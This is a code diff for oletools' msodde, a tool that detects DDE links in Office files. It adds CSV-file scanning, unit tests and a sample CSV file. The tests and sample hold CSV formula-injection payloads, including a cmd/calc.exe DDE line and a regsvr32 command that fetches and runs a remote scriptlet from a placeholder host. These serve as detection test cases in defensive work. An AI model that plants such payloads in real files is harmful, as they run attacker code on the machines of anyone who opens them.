+                results.append(u' '.join(match.groups()[:2]))
+
+    return u'\n'.join(results)
+
+
+def process_csv_dialect(file_handle, delimiters):
+    """ helper for process_csv: process with a specific csv dialect """
+
+    # determine dialect = delimiter chars, quote chars, ...
+    dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH),
+                                  delimiters=delimiters)
+    dialect.strict = False   # microsoft is never strict
+    log.debug('sniffed csv dialect with delimiter {0!r} '
+              'and quote char {1!r}'
+              .format(dialect.delimiter, dialect.quotechar))
+
+    # rewind file handle to start
+    file_handle.seek(0)
+
+    # loop over all csv rows and columns
+    results = []
+    reader = csv.reader(file_handle, dialect)
+    for row in reader:
+        for cell in row:
+            # check if cell matches
+            match = CSV_DDE_FORMAT.match(cell)
+            if match:
+                results.append(u' '.join(match.groups()[:2]))
+    return results, dialect
+
+
 def process_file(filepath, field_filter_mode=None):
-    """ decides which of process_doc/x or process_xls/x to call """
+    """ decides which of the process_* functions to call """
     if olefile.isOleFile(filepath):
-        log.debug('checking streams to see whether this is xls')
+        log.debug('Is OLE. Checking streams to see whether this is xls')
         if xls_parser.is_xls(filepath):
+            log.debug('Process file as excel 2003 (xls)')
             return process_xls(filepath)
         else:
+            log.debug('Process file as word 2003 (doc)')
            return process_doc(filepath)
 
     with open(filepath, 'rb') as file_handle:
-        if file_handle.read(4) == RTF_START:
-            # This is a RTF file
+        if file_handle.read(4) == RTF_START:
+            log.debug('Process file as rtf')
             return process_rtf(file_handle, field_filter_mode)
 
     try:
         doctype = ooxml.get_type(filepath)
-    except Exception:
-        log.debug('Exception trying to xml-parse file', exc_info=True)
+        log.debug('Detected file type: {0}'.format(doctype))
+    except Exception as exc:
+        log.debug('Exception trying to xml-parse file: {0}'.format(exc))
         doctype = None
 
-    if doctype:
-        log.debug('Detected file type: {0}'.format(doctype))
     if doctype == ooxml.DOCTYPE_EXCEL:
-        return process_xlsx(filepath, field_filter_mode)
-    else:
+        log.debug('Process file as excel 2007+ (xlsx)')
+        return process_xlsx(filepath)
+    elif doctype is None:
+        log.debug('Process file as csv')
+        return process_csv(filepath)
+    else:   # could be docx; if not: this is the old default code path
+        log.debug('Process file as word 2007+ (docx)')
         return process_docx(filepath, field_filter_mode)
 
 
-#=== MAIN =================================================================
+# === MAIN =================================================================
 
 def main(cmd_line_args=None):
     """ Main function, called if this file is called as a script
@@ -868,10 +978,10 @@ def main(cmd_line_args=None):
     if args.json and args.loglevel.lower() == 'debug':
         log.warning('Debug log output will not be json-compatible!')
 
-    if args.nounquote :
+    if args.nounquote:
         global NO_QUOTES
         NO_QUOTES = True
-
+
     if args.json:
         jout = []
         jout.append(BANNER_JSON)
@@ -890,7 +1000,7 @@ def main(cmd_line_args=None):
         except Exception as exc:
             if args.json:
                 jout.append(dict(type='error', error=type(exc).__name__,
-                                 message=str(exc)))   # strange: str(exc) is enclosed in ""
+                                 message=str(exc)))
             else:
                 raise   # re-raise last known exception, keeping trace intact
 
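End to end, the new dispatch means a file that is neither OLE, nor rtf, nor
recognized OOXML now falls through to process_csv. A hedged usage sketch (file
name and content invented; assumes the csv sniffer settles on ',' for this
input, as the new unittests suggest it does):

    import os
    from oletools import msodde

    with open('suspicious.csv', 'w') as writer:
        writer.write("day,value\n1,=cmd|'/k calc.exe'!''\n")

    print(msodde.process_file('suspicious.csv'))   # -> cmd '/k calc.exe'
    os.remove('suspicious.csv')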
tests/msodde/test_basic.py
@@ -17,11 +17,13 @@ from traceback import print_exc
 
 
 class TestReturnCode(unittest.TestCase):
+    """ check return codes and exception behaviour (not text output) """
 
     def test_valid_doc(self):
         """ check that a valid doc file leads to 0 exit status """
-        for filename in ('dde-test-from-office2003', 'dde-test-from-office2016',
-                         'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
+        for filename in (
+                'dde-test-from-office2003', 'dde-test-from-office2016',
+                'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
             self.do_test_validity(join(BASE_DIR, 'msodde',
                                        filename + '.doc'))
 
@@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase):
         except Exception:
             have_exception = True
             print_exc()
-        except SystemExit as se:   # sys.exit() was called
-            return_code = se.code
-            if se.code is None:
+        except SystemExit as exc:   # sys.exit() was called
+            return_code = exc.code
+            if exc.code is None:
                 return_code = 0
 
         self.assertEqual(expect_error, have_exception or (return_code != 0),
@@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase):
 
 
 class TestDdeLinks(unittest.TestCase):
+    """ capture output of msodde and check dde-links are found correctly """
 
     def get_dde_from_output(self, capturer):
-        """ helper to read dde links from captured output """
+        """ helper to read dde links from captured output
+
+        duplicate in tests/msodde/test_csv
+        """
         have_start_line = False
         result = []
         for line in capturer:
@@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase):
             elif line == 'DDE Links:':
                 have_start_line = True
 
-        self.assertTrue(have_start_line)  # ensure output was complete
+        self.assertTrue(have_start_line)   # ensure output was complete
         return result
 
     def test_with_dde(self):
tests/msodde/test_blacklist.py
@@ -39,8 +39,8 @@ EXAMPLES_MATCH = (
     r'ADVANCE \x 150',
     r'AUTHOR',
     r'AUTHOR "Tony Caruso"',
-    r'BIBLIOGRAPHY \l 1033',    # note: the original example has "/l 1033"
-    r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
+    r'BIBLIOGRAPHY \l 1033',     # note: the original example has "/l 1033"
+    r'CITATION Ecma01 \l 1033',  # note: this also. Hope this is just a typo
     r'COMMENTS',
     r'COMMENTS "I came, I saw, I was not impressed."',
     r'CREATEDATE',
@@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = (
     r'SKIPIF MERGEFIELD Order < 100',
 )
 
+
 class TestBlacklist(unittest.TestCase):
     """ Tests msodde blacklist feature """
 
tests/msodde/test_csv.py
new file mode 100644
+#!/usr/bin/env python3
+
+
+""" Check various csv examples """
+
+import unittest
+from tempfile import mkstemp
+import os
+from os.path import join
+
+from oletools import msodde
+from tests.test_utils import OutputCapture, DATA_BASE_DIR
+
+
+class TestCSV(unittest.TestCase):
+    """ Check various csv examples """
+
+    DO_DEBUG = False
+
+    def test_texts(self):
+        """ write some sample texts to file, run those """
+        SAMPLES = (
+            "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
+            "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
+            "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
+            "completely innocent text"
+        )
+
+        LONG_SAMPLE_FACTOR = 100   # make len(sample) > CSV_SMALL_THRESH
+        DELIMITERS = ',\t ;|^'
+        QUOTES = '', '"'   # no ' since samples use those "internally"
+        PREFIXES = ('', '{quote}item-before{quote}{delim}',
+                    '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
+                    '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
+                    '{quote}item-before{quote}{delim}')
+        SUFFIXES = ('', '{delim}{quote}item-after{quote}',
+                    '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
+                    '{delim}{quote}item-after{quote}' +
+                    '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)
+
+        for sample_core in SAMPLES:
+            for prefix in PREFIXES:
+                for suffix in SUFFIXES:
+                    for delim in DELIMITERS:
+                        for quote in QUOTES:
+                            # without quoting command is split at space or |
+                            if quote == '' and delim in sample_core:
+                                continue
+
+                            sample = \
+                                prefix.format(quote=quote, delim=delim) + \
+                                quote + sample_core + quote + \
+                                suffix.format(quote=quote, delim=delim)
+                            output = self.write_and_run(sample)
+                            n_links = len(self.get_dde_from_output(output))
+                            desc = 'sample with core={0!r}, prefix-len {1}, ' \
+                                   'suffix-len {2}, delim {3!r} and quote ' \
+                                   '{4!r}'.format(sample_core, len(prefix),
+                                                  len(suffix), delim, quote)
+                            if 'innocent' in sample:
+                                self.assertEqual(n_links, 0, 'found dde-link '
+                                                             'in clean sample')
+                            else:
+                                msg = 'Failed to find dde-link in ' + desc
+                                self.assertEqual(n_links, 1, msg)
+                            if self.DO_DEBUG:
+                                print('Worked: ' + desc)
+
+    def test_file(self):
+        """ test simple small example file """
+        filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
+        with OutputCapture() as capturer:
+            capturer.reload_module(msodde)   # re-create logger
+            ret_code = msodde.main([filename, ])
+        self.assertEqual(ret_code, 0)
+        links = self.get_dde_from_output(capturer)
+        self.assertEqual(len(links), 1)
+        self.assertEqual(links[0],
+                         r"cmd '/k \..\..\..\Windows\System32\calc.exe'")
+
+    def write_and_run(self, sample_text):
+        """ helper for test_texts: save text to file, run through msodde """
+        filename = None
+        handle = 0
+        try:
+            handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
+            os.write(handle, sample_text.encode('ascii'))
+            os.close(handle)
+            handle = 0
+            args = [filename, ]
+            if self.DO_DEBUG:
+                args += ['-l', 'debug']
+
+            with OutputCapture() as capturer:
+                capturer.reload_module(msodde)   # re-create logger
+                ret_code = msodde.main(args)
+            self.assertEqual(ret_code, 0, 'checking sample resulted in '
+                                          'error:\n' + sample_text)
+            return capturer
+
+        except Exception:
+            raise
+        finally:
+            if handle:
+                os.close(handle)
+                handle = 0   # just in case
+            if filename:
+                if self.DO_DEBUG:
+                    print('keeping for debug purposes: {0}'.format(filename))
+                else:
+                    os.remove(filename)
+                filename = None   # just in case
+
+    def get_dde_from_output(self, capturer):
+        """ helper to read dde links from captured output
+
+        duplicate in tests/msodde/test_basic
+        """
+        have_start_line = False
+        result = []
+        for line in capturer:
+            if self.DO_DEBUG:
+                print('captured: ' + line)
+            if not line.strip():
| 125 | + continue # skip empty lines | ||
| 126 | + if have_start_line: | ||
| 127 | + result.append(line) | ||
| 128 | + elif line == 'DDE Links:': | ||
| 129 | + have_start_line = True | ||
| 130 | + | ||
| 131 | + self.assertTrue(have_start_line) # ensure output was complete | ||
| 132 | + return result | ||
| 133 | + | ||
| 134 | + | ||
| 135 | +# just in case somebody calls this file as a script | ||
| 136 | +if __name__ == '__main__': | ||
| 137 | + unittest.main() |
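For readers who want to try the new CSV handling outside the test harness, the snippet below is a minimal sketch of what these tests automate. The file name and cell content are made up for illustration; only msodde.main and the 'DDE Links:' output section come from the code above.

    # Minimal sketch, assuming oletools with this patch is installed.
    # 'sample.csv' and its one-line content are made-up illustration values.
    from oletools import msodde

    with open('sample.csv', 'w') as handle:
        handle.write("=cmd|'/k calc.exe'!A0\n")

    ret_code = msodde.main(['sample.csv'])   # prints links under 'DDE Links:'
    print('exit code:', ret_code)            # the tests expect 0 on success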
tests/ooxml/test_basic.py
@@ -12,24 +12,33 @@ from oletools import ooxml
 class TestOOXML(unittest.TestCase):
     """ Tests my cool new feature """

+    DO_DEBUG = False
+
     def test_all_rough(self):
         """Checks all samples, expect either ole files or good ooxml output"""
         acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \
                      ooxml.DOCTYPE_POWERPOINT
+
+        # files that are neither OLE nor xml:
         except_files = 'empty', 'text'
-        except_extns = '.xml', '.rtf'
+        except_extns = '.xml', '.rtf', '.csv'
+
+        # analyse all files in data dir
         for base_dir, _, files in os.walk(DATA_BASE_DIR):
             for filename in files:
                 if filename in except_files:
-                    #print('skip file: ' + filename)
+                    if self.DO_DEBUG:
+                        print('skip file: ' + filename)
                     continue
                 if splitext(filename)[1] in except_extns:
-                    #print('skip extn: ' + filename)
+                    if self.DO_DEBUG:
+                        print('skip extn: ' + filename)
                     continue

                 full_name = join(base_dir, filename)
                 if isOleFile(full_name):
-                    #print('skip ole: ' + filename)
+                    if self.DO_DEBUG:
+                        print('skip ole: ' + filename)
                     continue
                 try:
                     doctype = ooxml.get_type(full_name)
@@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase):
                 self.assertTrue(doctype in acceptable,
                                 msg='Doctype "{0}" for {1} not acceptable'
                                     .format(doctype, full_name))
-                #print('ok: ' + filename + doctype)
+                if self.DO_DEBUG:
+                    print('ok: {0} --> {1}'.format(filename, doctype))


 # just in case somebody calls this file as a script
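As context for the acceptable-doctype check above, classifying a single file looks roughly like the sketch below; 'report.xlsx' is a made-up file name, everything else is taken from the test.

    # Sketch of a single-file classification, mirroring the loop above.
    # 'report.xlsx' is a hypothetical input file.
    from oletools import ooxml

    doctype = ooxml.get_type('report.xlsx')
    assert doctype in (ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD,
                       ooxml.DOCTYPE_POWERPOINT)
    print('doctype:', doctype)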
tests/test-data/msodde/dde-in-csv.csv
new file mode 100644
+=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0
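Background on this one-line sample: when Excel opens a CSV, a cell starting with '=' is evaluated as a formula, and the =service|'topic'!item form issues a DDE request, so a cell like the one above can start a shell. The pattern below is a simplified sketch of how such cells can be recognized; it is NOT the expression msodde actually uses.

    import re

    # Simplified illustration only -- not msodde's actual pattern.
    # Matches cells like =cmd|'/k calc.exe'!A0: formula marker, DDE
    # service name, pipe, quoted topic (the command), and an item part.
    DDE_CELL = re.compile(r"^\s*=\s*\w+\s*\|\s*'[^']*'\s*!\s*\S*")

    for cell in ("=cmd|'/k calc.exe'!A0", "completely innocent text"):
        print(cell, '->', 'DDE' if DDE_CELL.match(cell) else 'clean')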
tests/test_utils/output_capture.py
@@ -2,13 +2,20 @@

 from __future__ import print_function
 import sys
+import logging


 # python 2/3 version conflict:
 if sys.version_info.major <= 2:
     from StringIO import StringIO
+    # reload is a builtin
 else:
     from io import StringIO
+    if sys.version_info.minor < 4:
+        from imp import reload
+    else:
+        from importlib import reload
+

 class OutputCapture:
     """ context manager that captures stdout
@@ -24,6 +31,10 @@ class OutputCapture:
     # ...or test all output in one go
     some_test(capturer.get_data())

+    In order to solve issues with old logger instances that still remember a
+    closed StringIO as "their" stdout, logging is shut down and restarted upon
+    entering this context manager. This means that you may have to reload your
+    module as well.
     """

     def __init__(self):
@@ -32,6 +43,11 @@ class OutputCapture:
         self.data = None

     def __enter__(self):
+        # Avoid problems with old logger instances that still remember an old,
+        # closed StringIO as their sys.stdout
+        logging.shutdown()
+        reload(logging)
+
         # replace sys.stdout with own buffer.
         self.orig_stdout = sys.stdout
         sys.stdout = self.buffer
@@ -61,3 +77,7 @@ class OutputCapture:
     def __iter__(self):
         for line in self.get_data().splitlines():
             yield line
+
+    def reload_module(self, mod):
+        """ Wrapper around the reload function for different python versions """
+        return reload(mod)
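Putting the helper changes together, typical usage now looks like the sketch below, mirroring the msodde tests above ('some-file.csv' is a placeholder): reloading the module inside the capture rebinds its module-level logger to the fresh sys.stdout instead of a closed StringIO left over from an earlier test.

    # Sketch of the intended usage pattern; 'some-file.csv' is a placeholder.
    from oletools import msodde
    from tests.test_utils import OutputCapture

    with OutputCapture() as capturer:
        capturer.reload_module(msodde)       # logger now writes to the buffer
        ret_code = msodde.main(['some-file.csv'])

    for line in capturer:                    # OutputCapture is iterable
        print('captured:', line)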